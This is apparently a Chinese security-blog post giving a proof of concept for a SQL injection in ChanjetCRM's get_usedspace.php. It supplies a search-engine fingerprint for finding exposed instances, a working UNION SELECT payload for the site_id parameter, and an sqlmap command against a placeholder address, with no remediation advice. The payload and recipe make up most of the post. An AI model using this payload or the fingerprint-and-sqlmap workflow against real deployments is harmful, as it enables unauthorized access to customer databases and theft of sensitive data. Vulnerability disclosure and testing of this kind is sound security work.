ChanjetCRM get_usedspace.php SQL注入漏洞

# ChanjetCRM get_usedspace.php SQL注入漏洞 ## 漏洞描述 ChanjetCRM get_usedspace.php存在SQL漏洞,通过漏洞可获取数据库敏感信息 ## 漏洞影响 ChanjetCRM ## 网络测绘 ti...

ChanjetCRM get_usedspace.php SQL注入漏洞

漏洞描述

ChanjetCRM get_usedspace.php存在SQL漏洞,通过漏洞可获取数据库敏感信息

漏洞影响

ChanjetCRM

网络测绘

title="ChanjetCRM"

漏洞复现

登录页面

img

验证POC

/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)--

img

使用Sqlmap验证漏洞

sqlmap -u "http://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id

img

  • 发表于 2024-07-12 18:45:43
  • 阅读 ( 2288 )
  • 分类:Web应用

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计